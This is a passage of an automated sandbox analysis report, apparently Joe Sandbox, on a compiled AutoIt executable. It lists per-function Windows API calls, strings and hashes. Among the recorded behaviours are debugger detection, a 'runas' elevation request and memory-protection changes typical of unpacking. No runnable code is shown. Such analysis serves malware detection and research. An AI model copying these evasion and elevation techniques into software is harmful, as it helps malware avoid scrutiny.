91559 321e6f _memset 91557->91559 91558->91546 91574 3238e4 91559->91574 91561 321eda KillTimer SetTimer 91561->91558 91562 321e96 91562->91561 91563 394518 Shell_NotifyIconW 91562->91563 91563->91561 91564->91541 91565->91546 91566->91546 91567->91528 91568->91543 91569->91555 91570->91553 91571->91552 91572->91553 91573->91545 91575 323900 91574->91575 91595 3239d5 Mailbox 91574->91595 91576 327b6e 48 API calls 91575->91576 91577 32390e 91576->91577 91578 39453f LoadStringW 91577->91578 91579 32391b 91577->91579 91582 394559 91578->91582 91580 327e53 48 API calls 91579->91580 91581 323930 91580->91581 91581->91582 91583 323941 91581->91583 

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0032376D
                                          • Part of subcall function 00324257: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI4976.tmp,00000104,?,00000000,00000001,00000000), ref: 0032428C
                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 0032377F
                                        • GetFullPathNameW.KERNEL32(C:\Windows\Installer\MSI4976.tmp,00000104,?,003E1120,C:\Windows\Installer\MSI4976.tmp,003E1124,?,?), ref: 003237EE
                                          • Part of subcall function 003234F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0032352A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00323860
                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,003D2934,00000010), ref: 003921C5
                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 003921FD
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00392232
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003BDAA4), ref: 00392290
                                        • ShellExecuteW.SHELL32(00000000), ref: 00392297
                                          • Part of subcall function 003230A5: GetSysColorBrush.USER32(0000000F), ref: 003230B0
                                          • Part of subcall function 003230A5: LoadCursorW.USER32(00000000,00007F00), ref: 003230BF
                                          • Part of subcall function 003230A5: LoadIconW.USER32(00000063), ref: 003230D5
                                          • Part of subcall function 003230A5: LoadIconW.USER32(000000A4), ref: 003230E7
                                          • Part of subcall function 003230A5: LoadIconW.USER32(000000A2), ref: 003230F9
                                          • Part of subcall function 003230A5: RegisterClassExW.USER32(?), ref: 00323167
                                          • Part of subcall function 00322E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00322ECB
                                          • Part of subcall function 00322E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00322EEC
                                          • Part of subcall function 00322E9D: ShowWindow.USER32(00000000), ref: 00322F00
                                          • Part of subcall function 00322E9D: ShowWindow.USER32(00000000), ref: 00322F09
                                          • Part of subcall function 00323598: _memset.LIBCMT ref: 003235BE
                                          • Part of subcall function 00323598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00323667
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                        • String ID: C:\Windows\Installer\MSI4976.tmp$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$">
                                        • API String ID: 4253510256-1924644571
                                        • Opcode ID: f231bb50a817db2519a4f3b93a448edf1bb18400fa49b967bfc076e3c6bbb03e
                                        • Instruction ID: fc50768da57f0a53848de52cd11edd0ecb9169e0540bd6470a37553ea48ba759
                                        • Opcode Fuzzy Hash: f231bb50a817db2519a4f3b93a448edf1bb18400fa49b967bfc076e3c6bbb03e
                                        • Instruction Fuzzy Hash: B85129756442A4BACF13ABA0FC86FEE7B7C9B15700F000156F6429E1E1D7744A48DB62

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00383AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038317F
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0038321E
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003832B6
                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003834F5
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00383502
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                        • String ID:
                                        • API String ID: 1240663315-0
                                        • Opcode ID: 91ce6a39cb6d88ec3ac264660b0d896f33e60696ab9145ddeb6301a1383ab9b4
                                        • Instruction ID: 57406d863e5388335cb881500fd073a8723874dca2f925dc92c49d55431cca3b
                                        • Opcode Fuzzy Hash: 91ce6a39cb6d88ec3ac264660b0d896f33e60696ab9145ddeb6301a1383ab9b4
                                        • Instruction Fuzzy Hash: 49E15A35204310AFCB16EF29C895D6ABBE8EF89714F04856DF54ADB361DA30EE05CB52

                                        Control-flow Graph

                                        APIs
                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00322A33
                                        • KillTimer.USER32(?,00000001), ref: 00322A5D
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00322A80
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00322A8B
                                        • CreatePopupMenu.USER32 ref: 00322A9F
                                        • PostQuitMessage.USER32(00000000), ref: 00322AAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                        • String ID: TaskbarCreated
                                        • API String ID: 157504867-2362178303
                                        • Opcode ID: 1f02ef31eeaa9cd65487402f246288e1c29238ebc87399672fba058a3fc0676a
                                        • Instruction ID: 8b1a97d95007ca8064787dcbc769d17f6ae847c5370e539f13da901e8f9f779b
                                        • Opcode Fuzzy Hash: 1f02ef31eeaa9cd65487402f246288e1c29238ebc87399672fba058a3fc0676a
                                        • Instruction Fuzzy Hash: 1B4124312006A9BBDB37AF68BC49BBF365DE719300F450325F902AACE1DE749C508761
                                        APIs
                                        • GetVersionExW.KERNEL32(?,00000000), ref: 0033E4A7
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • GetCurrentProcess.KERNEL32(00000000,003BDC28,?,?), ref: 0033E567
                                        • GetNativeSystemInfo.KERNEL32(?,003BDC28,?,?), ref: 0033E5BC
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0033E5C7
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0033E5DA
                                        • GetSystemInfo.KERNEL32(?,003BDC28,?,?), ref: 0033E5E4
                                        • GetSystemInfo.KERNEL32(?,003BDC28,?,?), ref: 0033E5F0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                        • String ID:
                                        • API String ID: 2717633055-0
                                        • Opcode ID: b8f0f67997e3b7785df7c348af76230b40a9fc7f39b385bcc814eb28115f81ba
                                        • Instruction ID: 11d03008db83eade6eacfc9c75a8247ec3ce3927bec9c1b230dd1821a58e590f
                                        • Opcode Fuzzy Hash: b8f0f67997e3b7785df7c348af76230b40a9fc7f39b385bcc814eb28115f81ba
                                        • Instruction Fuzzy Hash: 9361B1B2809284DBDF17CF6898C11EA7FA46F2B304F1A45D9D8459F287D634C948CF65
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00323202
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00323219
                                        • LoadResource.KERNEL32(?,00000000), ref: 003957D7
                                        • SizeofResource.KERNEL32(?,00000000), ref: 003957EC
                                        • LockResource.KERNEL32(?), ref: 003957FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: 6932ee811385509d77792d5be6cc89451926be14a0080494d875176c7a3546d2
                                        • Instruction ID: 2279349eeff8486f7cfae51ebe480bbf9550e40ff7d268cfc683712ac692d150
                                        • Opcode Fuzzy Hash: 6932ee811385509d77792d5be6cc89451926be14a0080494d875176c7a3546d2
                                        • Instruction Fuzzy Hash: 8E117971204715BFE7228B65EC48F677BBDEBCAB41F208828F40296A90DB71DD00CA70
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00366F7D
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00366F8D
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00366FAC
                                        • __wsplitpath.LIBCMT ref: 00366FD0
                                        • _wcscat.LIBCMT ref: 00366FE3
                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00367022
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                        • String ID:
                                        • API String ID: 1605983538-0
                                        • Opcode ID: b5f6ff5c67e220e94f73b8a5600cba11449241a7cd0a7f95c23bc60d818d6077
                                        • Instruction ID: 3d89e8633a55ee72c4baa648b50d3939a5e6752634089435b55f042d11071f8b
                                        • Opcode Fuzzy Hash: b5f6ff5c67e220e94f73b8a5600cba11449241a7cd0a7f95c23bc60d818d6077
                                        • Instruction Fuzzy Hash: 5B218771904218ABDB12EBA0CC89BEEBBFCAB49304F5044E5F545E7141E7759F84CB60
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 0048B1FA
                                        • GetProcAddress.KERNEL32(?,00484FF9), ref: 0048B218
                                        • ExitProcess.KERNEL32(?,00484FF9), ref: 0048B229
                                        • VirtualProtect.KERNEL32(00320000,00001000,00000004,?,00000000), ref: 0048B277
                                        • VirtualProtect.KERNEL32(00320000,00001000), ref: 0048B28C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                        • String ID:
                                        • API String ID: 1996367037-0
                                        • Opcode ID: 0ba1124f75322a47437ec4a0ae1606bd38f9ea060c8abc66f020468a88c53be8
                                        • Instruction ID: 3c02a9696f5b01d2075d052e4b7775ce007947dc5b52934d4115712527763376
                                        • Opcode Fuzzy Hash: 0ba1124f75322a47437ec4a0ae1606bd38f9ea060c8abc66f020468a88c53be8
                                        • Instruction Fuzzy Hash: 0C513971A543124FD720AEB8DCD867EB7A0EB123607180F7AD5E1CB3C5E798580683E9
                                        APIs
                                          • Part of subcall function 003678AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 003678CB
                                        • CoInitialize.OLE32(00000000), ref: 0036F04D
                                        • CoCreateInstance.COMBASE(003ADA7C,00000000,00000001,003AD8EC,?), ref: 0036F066
                                        • CoUninitialize.COMBASE ref: 0036F083
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                        • String ID: .lnk
                                        • API String ID: 2126378814-24824748
                                        • Opcode ID: 92aa5d4dcb1a7cc59839412f22249515643b9db9c5da0ecfb3135da658c6e378
                                        • Instruction ID: 3eb2c2a7dca3fa7073030eac7ced6d4fda970ef3f799c70555ba47f9a473e6d6
                                        • Opcode Fuzzy Hash: 92aa5d4dcb1a7cc59839412f22249515643b9db9c5da0ecfb3135da658c6e378
                                        • Instruction Fuzzy Hash: E2A178356043019FC711DF14D894D5ABBE9FF89320F158958F89A9B3A2CB31ED45CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: G-2
                                        • API String ID: 0-1651067192
                                        • Opcode ID: 99b8824d751465b8ebd99dc28811477169e93d2a8d5ae64bf29c6c5bada141b0
                                        • Instruction ID: a1503cc016d6b6debcd14e0c338c35b76e50cc9e9a27643a5f587eba23700686
                                        • Opcode Fuzzy Hash: 99b8824d751465b8ebd99dc28811477169e93d2a8d5ae64bf29c6c5bada141b0
                                        • Instruction Fuzzy Hash: 5D22CC74A00226DFDB26DF58E491ABAF7F0FF49300F158069E9569B391E730AD81CB91
                                        APIs
                                        • GetFileAttributesW.KERNEL32(0032C848,0032C848), ref: 0033DDA2
                                        • FindFirstFileW.KERNEL32(0032C848,?), ref: 00394A83
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$AttributesFindFirst
                                        • String ID:
                                        • API String ID: 4185537391-0
                                        • Opcode ID: df7b4955086562a349bf96f3a9d2511351f70421cb5adf975fde2eba4ba04437
                                        • Instruction ID: b5a46826d6c23a23eab404ed75b0b19625caa78666d67c6f95808cf561a5387d
                                        • Opcode Fuzzy Hash: df7b4955086562a349bf96f3a9d2511351f70421cb5adf975fde2eba4ba04437
                                        • Instruction Fuzzy Hash: CDE0DF32814401AB8616673CEC4D8FA379C9E0A338F200706F837C28E0EB70AD4586DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID:
                                        • API String ID: 3964851224-0
                                        • Opcode ID: e89be7c2fa557b00759739ce0713ce02430bdf937c1dc4f311e133fb7465c632
                                        • Instruction ID: 7b0730361b2c5d43cd46aa6ea52f5e26559c8e234a4c04e7d1b94d255e951ec4
                                        • Opcode Fuzzy Hash: e89be7c2fa557b00759739ce0713ce02430bdf937c1dc4f311e133fb7465c632
                                        • Instruction Fuzzy Hash: E99268706087418FDB26DF18C4C0B6AB7E4BF88304F15895DE98A8B3A2D775ED45CB92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: e7a40e996ff260008f3990d4f3a3e00f5ff364f2b2e201b7bf9d3ac43c1a033b
                                        • Instruction ID: d0b8184f7906cc3f347c040326595d8bb37d391ea5d7ead4369fdf371d95f8d5
                                        • Opcode Fuzzy Hash: e7a40e996ff260008f3990d4f3a3e00f5ff364f2b2e201b7bf9d3ac43c1a033b
                                        • Instruction Fuzzy Hash: 0EC04CB140401EDFCB56CB80D9459EFB7BCBB04300F104095A116E1400D7709B459B71
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032E279
                                        • timeGetTime.WINMM ref: 0032E51A
                                        • TranslateMessage.USER32(?), ref: 0032E646
                                        • DispatchMessageW.USER32(?), ref: 0032E651
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032E664
                                        • LockWindowUpdate.USER32(00000000), ref: 0032E697
                                        • DestroyWindow.USER32 ref: 0032E6A3
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032E6BD
                                        • Sleep.KERNEL32(0000000A), ref: 00395B15
                                        • TranslateMessage.USER32(?), ref: 003962AF
                                        • DispatchMessageW.USER32(?), ref: 003962BD
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003962D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                        • API String ID: 2641332412-570651680
                                        • Opcode ID: 01e846193ded49315849460d2b128b152c78fc81e250e6770457ea190a834b49
                                        • Instruction ID: b25ce83d6bdc3964263685a444bfacadfef0ba2908241d7cefa6c714962685fe
                                        • Opcode Fuzzy Hash: 01e846193ded49315849460d2b128b152c78fc81e250e6770457ea190a834b49
                                        • Instruction Fuzzy Hash: A762DE70508350DFDB27DF24D886BAA77E8AF45304F14496DF94A8F292DB74E888CB52
                                        APIs
                                        • ___createFile.LIBCMT ref: 00356C73
                                        • ___createFile.LIBCMT ref: 00356CB4
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00356CDD
                                        • __dosmaperr.LIBCMT ref: 00356CE4
                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00356CF7
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00356D1A
                                        • __dosmaperr.LIBCMT ref: 00356D23
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00356D2C
                                        • __set_osfhnd.LIBCMT ref: 00356D5C
                                        • __lseeki64_nolock.LIBCMT ref: 00356DC6
                                        • __close_nolock.LIBCMT ref: 00356DEC
                                        • __chsize_nolock.LIBCMT ref: 00356E1C
                                        • __lseeki64_nolock.LIBCMT ref: 00356E2E
                                        • __lseeki64_nolock.LIBCMT ref: 00356F26
                                        • __lseeki64_nolock.LIBCMT ref: 00356F3B
                                        • __close_nolock.LIBCMT ref: 00356F9B
                                          • Part of subcall function 0034F84C: CloseHandle.KERNEL32(00000000,003CEEC4,00000000,?,00356DF1,003CEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0034F89C
                                          • Part of subcall function 0034F84C: GetLastError.KERNEL32(?,00356DF1,003CEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0034F8A6
                                          • Part of subcall function 0034F84C: __free_osfhnd.LIBCMT ref: 0034F8B3
